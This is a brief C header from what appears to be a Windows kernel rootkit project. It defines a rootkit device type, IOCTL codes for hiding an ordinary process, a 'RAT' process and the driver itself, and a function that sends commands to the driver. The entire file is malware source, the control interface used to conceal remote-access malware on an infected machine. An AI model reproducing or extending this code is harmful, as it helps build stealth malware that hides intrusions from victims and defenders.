#pragma once


#include "global_config.h"

#define FILE_DEVICE_RK 0x00008001
#define IOCTL_HIDE_PROCESS_CMD CTL_CODE(FILE_DEVICE_RK, 0x801, METHOD_BUFFERED, FILE_READ_DATA | FILE_WRITE_DATA)
#define IOCTL_HIDE_RAT_PROCESS_CMD CTL_CODE(FILE_DEVICE_RK, 0x802, METHOD_BUFFERED, FILE_READ_DATA | FILE_WRITE_DATA)


#define IOCTL_HIDE_DRIVER_CMD CTL_CODE(FILE_DEVICE_RK, 0x806, METHOD_BUFFERED, FILE_READ_DATA | FILE_WRITE_DATA)

int send_driver_commands();



